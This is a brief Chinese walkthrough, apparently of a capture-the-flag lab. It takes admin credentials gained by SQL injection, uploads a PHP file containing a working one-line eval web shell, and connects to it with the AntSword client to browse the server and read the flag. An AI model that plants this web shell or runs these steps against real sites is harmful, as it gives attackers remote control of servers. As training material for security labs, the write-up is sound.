一、进入后台(靶机测试)
通过sql注入得到的账号与密码进入后台
二、上传文件
1、找到后台内上传文件位置上传一个webshell.php文件其中包含
<?php @eval($_POST['shell']);?>
2、找到网站前台页面点击文件
选择你所上传文件点击下载从下载页面获取文件网址
三、通过蚁剑获取服务器目录
1、打开蚁剑点击右键选择添加数据
2、将获得的文件网址放进第一行密码填入shell
3、点击保存
双击网址即可进入服务器目录
四、寻找flag
进入根目录点击flag文件
完成
版权声明:本文为weixin_50205723原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。